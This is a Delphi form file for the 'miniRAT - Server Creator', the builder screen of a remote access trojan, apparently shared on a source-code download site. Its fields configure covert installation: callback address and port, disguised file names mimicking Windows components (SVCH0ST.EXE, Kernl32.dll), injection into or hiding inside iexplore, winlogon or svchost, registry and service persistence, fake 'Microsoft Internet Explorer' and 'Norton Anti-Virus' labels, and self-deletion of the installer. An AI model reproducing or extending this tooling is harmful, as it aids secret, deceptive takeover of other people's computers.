untServerCreator.dfm
上传用户:sinothink
上传日期:2022-07-15
资源大小:459k
文件大小:11k
源码类别:

远程控制编程

开发平台:

Delphi

  1. object Form7: TForm7
  2.   Left = 36
  3.   Top = 212
  4.   BorderIcons = [biSystemMenu, biMinimize]
  5.   BorderStyle = bsSingle
  6.   Caption = 'miniRAT - Server Creator'
  7.   ClientHeight = 304
  8.   ClientWidth = 709
  9.   Color = clBtnFace
  10.   Font.Charset = DEFAULT_CHARSET
  11.   Font.Color = clWindowText
  12.   Font.Height = -11
  13.   Font.Name = 'Tahoma'
  14.   Font.Style = []
  15.   OldCreateOrder = False
  16.   PixelsPerInch = 96
  17.   TextHeight = 13
  18.   object Bevel2: TBevel
  19.     Left = 8
  20.     Top = 139
  21.     Width = 313
  22.     Height = 9
  23.     Shape = bsTopLine
  24.   end
  25.   object Label3: TLabel
  26.     Left = 8
  27.     Top = 160
  28.     Width = 97
  29.     Height = 21
  30.     AutoSize = False
  31.     Caption = 'Server Port :'
  32.     Layout = tlCenter
  33.   end
  34.   object Label4: TLabel
  35.     Left = 8
  36.     Top = 184
  37.     Width = 97
  38.     Height = 21
  39.     AutoSize = False
  40.     Caption = 'Server DNS :'
  41.     Layout = tlCenter
  42.   end
  43.   object Label5: TLabel
  44.     Left = 8
  45.     Top = 208
  46.     Width = 97
  47.     Height = 21
  48.     AutoSize = False
  49.     Caption = 'Server Pass :'
  50.     Layout = tlCenter
  51.   end
  52.   object Label6: TLabel
  53.     Left = 8
  54.     Top = 232
  55.     Width = 97
  56.     Height = 21
  57.     AutoSize = False
  58.     Caption = 'Registery Key :'
  59.     Layout = tlCenter
  60.   end
  61.   object Label8: TLabel
  62.     Left = 30
  63.     Top = 40
  64.     Width = 60
  65.     Height = 12
  66.     Caption = #23433#35013#36335#24452#65306
  67.     Font.Charset = GB2312_CHARSET
  68.     Font.Color = clWindowText
  69.     Font.Height = -12
  70.     Font.Name = #23435#20307
  71.     Font.Style = []
  72.     ParentFont = False
  73.   end
  74.   object Label9: TLabel
  75.     Left = 30
  76.     Top = 62
  77.     Width = 60
  78.     Height = 12
  79.     Caption = #23433#35013#21517#31216#65306
  80.     Font.Charset = GB2312_CHARSET
  81.     Font.Color = clWindowText
  82.     Font.Height = -12
  83.     Font.Name = #23435#20307
  84.     Font.Style = []
  85.     ParentFont = False
  86.   end
  87.   object spSkinStdLabel1: TLabel
  88.     Left = 34
  89.     Top = 83
  90.     Width = 54
  91.     Height = 12
  92.     Caption = 'DLL'#21517#31216#65306
  93.     Font.Charset = GB2312_CHARSET
  94.     Font.Color = clWindowText
  95.     Font.Height = -12
  96.     Font.Name = #23435#20307
  97.     Font.Style = []
  98.     ParentFont = False
  99.   end
  100.   object spSkinStdLabel2: TLabel
  101.     Left = 8
  102.     Top = 102
  103.     Width = 84
  104.     Height = 12
  105.     Caption = #38544#34255#22312#36827#31243#20013#65306
  106.     Font.Charset = GB2312_CHARSET
  107.     Font.Color = clWindowText
  108.     Font.Height = -12
  109.     Font.Name = #23435#20307
  110.     Font.Style = []
  111.     ParentFont = False
  112.   end
  113.   object Label14: TLabel
  114.     Left = 504
  115.     Top = 166
  116.     Width = 60
  117.     Height = 12
  118.     Caption = #26174#31034#21517#31216#65306
  119.     Font.Charset = GB2312_CHARSET
  120.     Font.Color = clMaroon
  121.     Font.Height = -12
  122.     Font.Name = #23435#20307
  123.     Font.Style = []
  124.     ParentFont = False
  125.   end
  126.   object Label15: TLabel
  127.     Left = 504
  128.     Top = 190
  129.     Width = 60
  130.     Height = 12
  131.     Caption = #26381#21153#21517#31216#65306
  132.     Font.Charset = GB2312_CHARSET
  133.     Font.Color = clMaroon
  134.     Font.Height = -12
  135.     Font.Name = #23435#20307
  136.     Font.Style = []
  137.     ParentFont = False
  138.   end
  139.   object Label16: TLabel
  140.     Left = 504
  141.     Top = 215
  142.     Width = 60
  143.     Height = 12
  144.     Caption = #25551#36848#20449#24687#65306
  145.     Font.Charset = GB2312_CHARSET
  146.     Font.Color = clMaroon
  147.     Font.Height = -12
  148.     Font.Name = #23435#20307
  149.     Font.Style = []
  150.     ParentFont = False
  151.   end
  152.   object Label7: TLabel
  153.     Left = 319
  154.     Top = 245
  155.     Width = 60
  156.     Height = 12
  157.     Caption = #19978#32447#20998#32452#65306
  158.     Font.Charset = GB2312_CHARSET
  159.     Font.Color = clMaroon
  160.     Font.Height = -12
  161.     Font.Name = #23435#20307
  162.     Font.Style = []
  163.     ParentFont = False
  164.   end
  165.   object CheckBox1: TCheckBox
  166.     Left = 200
  167.     Top = 184
  168.     Width = 121
  169.     Height = 17
  170.     Caption = 'Inject server into IE'
  171.     TabOrder = 0
  172.     Visible = False
  173.   end
  174.   object portEdit: TEdit
  175.     Left = 104
  176.     Top = 160
  177.     Width = 89
  178.     Height = 21
  179.     TabOrder = 1
  180.     Text = '80'
  181.   end
  182.   object Button1: TButton
  183.     Left = 200
  184.     Top = 160
  185.     Width = 121
  186.     Height = 21
  187.     Caption = 'Randomize a Port'
  188.     TabOrder = 2
  189.     OnClick = Button1Click
  190.   end
  191.   object dnsEdit: TEdit
  192.     Left = 104
  193.     Top = 184
  194.     Width = 89
  195.     Height = 21
  196.     TabOrder = 3
  197.     Text = '192.168.5.2'
  198.   end
  199.   object passEdit: TEdit
  200.     Left = 104
  201.     Top = 208
  202.     Width = 89
  203.     Height = 21
  204.     PasswordChar = '*'
  205.     TabOrder = 4
  206.     Text = 'sabason'
  207.   end
  208.   object Button2: TButton
  209.     Left = 624
  210.     Top = 264
  211.     Width = 65
  212.     Height = 17
  213.     Caption = '&Build'
  214.     TabOrder = 5
  215.     OnClick = Button2Click
  216.   end
  217.   object ProgressBar1: TProgressBar
  218.     Left = 8
  219.     Top = 264
  220.     Width = 593
  221.     Height = 17
  222.     Smooth = True
  223.     TabOrder = 6
  224.   end
  225.   object Edit6: TEdit
  226.     Left = 104
  227.     Top = 232
  228.     Width = 89
  229.     Height = 21
  230.     TabOrder = 7
  231.     Text = 'Norton Anti-Virus'
  232.   end
  233.   object ComboBox1: TComboBox
  234.     Left = 95
  235.     Top = 36
  236.     Width = 180
  237.     Height = 20
  238.     Font.Charset = GB2312_CHARSET
  239.     Font.Color = clBlue
  240.     Font.Height = -12
  241.     Font.Name = #23435#20307
  242.     Font.Style = []
  243.     ItemHeight = 12
  244.     ItemIndex = 1
  245.     ParentFont = False
  246.     TabOrder = 8
  247.     Text = '<System>'
  248.     Items.Strings = (
  249.       '<Windows>'
  250.       '<System>'
  251.       '<Temp>')
  252.   end
  253.   object ComboBox2: TComboBox
  254.     Left = 97
  255.     Top = 59
  256.     Width = 178
  257.     Height = 20
  258.     Font.Charset = GB2312_CHARSET
  259.     Font.Color = clBlue
  260.     Font.Height = -12
  261.     Font.Name = #23435#20307
  262.     Font.Style = []
  263.     ItemHeight = 12
  264.     ItemIndex = 0
  265.     ParentFont = False
  266.     TabOrder = 9
  267.     Text = 'RAVMOND.EXE'
  268.     Items.Strings = (
  269.       'RAVMOND.EXE'
  270.       'Explore.EXE'
  271.       'Winlogo.EXE'
  272.       'Windows.EXE'
  273.       '2005022.exe'
  274.       'hmy.bat'
  275.       'hmyServer.com'
  276.       'SVCH0ST.EXE'
  277.       'SP00LSV.EXE'
  278.       'RAVMOND.EXE')
  279.   end
  280.   object ComboBoxDll: TComboBox
  281.     Left = 97
  282.     Top = 81
  283.     Width = 178
  284.     Height = 20
  285.     Font.Charset = GB2312_CHARSET
  286.     Font.Color = clBlue
  287.     Font.Height = -12
  288.     Font.Name = #23435#20307
  289.     Font.Style = []
  290.     ItemHeight = 12
  291.     ItemIndex = 0
  292.     ParentFont = False
  293.     TabOrder = 10
  294.     Text = 'Kernl32.dll'
  295.     Items.Strings = (
  296.       'Kernl32.dll'
  297.       'samlibs.dll'
  298.       'scriptpws.dll')
  299.   end
  300.   object ComboBoxHost: TComboBox
  301.     Left = 96
  302.     Top = 101
  303.     Width = 178
  304.     Height = 19
  305.     Font.Charset = ANSI_CHARSET
  306.     Font.Color = clBlue
  307.     Font.Height = -11
  308.     Font.Name = #23435#20307
  309.     Font.Style = []
  310.     ItemHeight = 11
  311.     ItemIndex = 0
  312.     ParentFont = False
  313.     TabOrder = 11
  314.     Text = 'Iexplore.exe'
  315.     Items.Strings = (
  316.       'Iexplore.exe'
  317.       'explorer.exe'
  318.       'winlogon.exe'
  319.       'svchost.exe'
  320.       'GreenBrowser')
  321.   end
  322.   object CheckBox2: TCheckBox
  323.     Left = 22
  324.     Top = 120
  325.     Width = 247
  326.     Height = 18
  327.     Caption = #33258#21160#21024#38500#23433#35013#25991#20214
  328.     Checked = True
  329.     State = cbChecked
  330.     TabOrder = 12
  331.   end
  332.   object CheckBox8: TCheckBox
  333.     Left = 334
  334.     Top = 144
  335.     Width = 231
  336.     Height = 17
  337.     Caption = 'Win9x'#19979#20889#20837#27880#20876#34920#21551#21160#39033
  338.     Checked = True
  339.     State = cbChecked
  340.     TabOrder = 13
  341.   end
  342.   object RadioBox1: TCheckBox
  343.     Left = 534
  344.     Top = 140
  345.     Width = 176
  346.     Height = 17
  347.     Caption = 'Win2000'#19979#23433#35013#25104#26381#21153#21551#21160
  348.     Checked = True
  349.     State = cbChecked
  350.     TabOrder = 14
  351.   end
  352.   object ServerView: TEdit
  353.     Left = 563
  354.     Top = 162
  355.     Width = 128
  356.     Height = 20
  357.     Hint = #36825#37324#20449#24687#20250#20986#29616#22312#33258#21160#19978#32447#21015#34920#30340#22791#27880#26639#37324'!'#27492#26639#21487#20197#19981#22635'!'
  358.     Font.Charset = GB2312_CHARSET
  359.     Font.Color = clWindowText
  360.     Font.Height = -12
  361.     Font.Name = #23435#20307
  362.     Font.Style = []
  363.     ImeName = #26368#24378#20116#31508#36755#20837#27861
  364.     MaxLength = 30
  365.     ParentFont = False
  366.     ParentShowHint = False
  367.     ShowHint = False
  368.     TabOrder = 15
  369.     Text = 'Microsoft Internet Explorer'
  370.   end
  371.   object ServerName: TEdit
  372.     Left = 563
  373.     Top = 186
  374.     Width = 128
  375.     Height = 20
  376.     Hint = #36825#37324#20449#24687#20250#20986#29616#22312#33258#21160#19978#32447#21015#34920#30340#22791#27880#26639#37324'!'#27492#26639#21487#20197#19981#22635'!'
  377.     Font.Charset = GB2312_CHARSET
  378.     Font.Color = clWindowText
  379.     Font.Height = -12
  380.     Font.Name = #23435#20307
  381.     Font.Style = []
  382.     ImeName = #26368#24378#20116#31508#36755#20837#27861
  383.     MaxLength = 30
  384.     ParentFont = False
  385.     ParentShowHint = False
  386.     ShowHint = False
  387.     TabOrder = 16
  388.     Text = 'MicIE'
  389.   end
  390.   object ServerText: TEdit
  391.     Left = 563
  392.     Top = 211
  393.     Width = 128
  394.     Height = 20
  395.     Hint = #36825#37324#20449#24687#20250#20986#29616#22312#33258#21160#19978#32447#21015#34920#30340#22791#27880#26639#37324'!'#27492#26639#21487#20197#19981#22635'!'
  396.     Font.Charset = GB2312_CHARSET
  397.     Font.Color = clWindowText
  398.     Font.Height = -12
  399.     Font.Name = #23435#20307
  400.     Font.Style = []
  401.     ImeName = #26368#24378#20116#31508#36755#20837#27861
  402.     MaxLength = 30
  403.     ParentFont = False
  404.     ParentShowHint = False
  405.     ShowHint = False
  406.     TabOrder = 17
  407.     Text = 'Microsoft Internet Explorer'
  408.   end
  409.   object CheckBox9: TCheckBox
  410.     Left = 328
  411.     Top = 168
  412.     Width = 177
  413.     Height = 17
  414.     Hint = #24120#35268#33258#21160#21551#21160#23481#26131#21457#29616
  415.     Caption = #22312#38190#20540'(Local Machine)'#27880#20876
  416.     Checked = True
  417.     State = cbChecked
  418.     TabOrder = 18
  419.   end
  420.   object CheckBox10: TCheckBox
  421.     Left = 328
  422.     Top = 192
  423.     Width = 164
  424.     Height = 17
  425.     Hint = #21482#35201#21551#21160'explorer'#27880#21551#21160
  426.     Caption = #27880#20876#25104'shell'
  427.     TabOrder = 19
  428.   end
  429.   object CheckBox11: TCheckBox
  430.     Left = 328
  431.     Top = 216
  432.     Width = 160
  433.     Height = 17
  434.     Hint = #21482#26377#19968#20010#29992#25143#21551#21160#26102#25165#21152#36733
  435.     Caption = #22312#38190#20540'Current User'#20013#27880#20876#23376
  436.     TabOrder = 20
  437.   end
  438.   object RadioGroup1: TRadioGroup
  439.     Left = 24
  440.     Top = 0
  441.     Width = 361
  442.     Height = 33
  443.     Columns = 2
  444.     Font.Charset = GB2312_CHARSET
  445.     Font.Color = clBtnText
  446.     Font.Height = -12
  447.     Font.Name = #23435#20307
  448.     Font.Style = []
  449.     ItemIndex = 1
  450.     Items.Strings = (
  451.       #20027#21160#36830#25509
  452.       #33258#21160#36830#25509)
  453.     ParentFont = False
  454.     TabOrder = 21
  455.   end
  456.   object GrEdit3: TEdit
  457.     Left = 393
  458.     Top = 241
  459.     Width = 213
  460.     Height = 20
  461.     Font.Charset = GB2312_CHARSET
  462.     Font.Color = clMaroon
  463.     Font.Height = -12
  464.     Font.Name = #23435#20307
  465.     Font.Style = []
  466.     ImeName = #26368#24378#20116#31508#36755#20837#27861
  467.     MaxLength = 30
  468.     ParentFont = False
  469.     ParentShowHint = False
  470.     ShowHint = False
  471.     TabOrder = 22
  472.     Text = #33258#21160#19978#32447#20027#26426
  473.   end
  474.   object dlgSave1: TSaveDialog
  475.     FileName = 'server.exe'
  476.     Left = 344
  477.     Top = 56
  478.   end
  479. end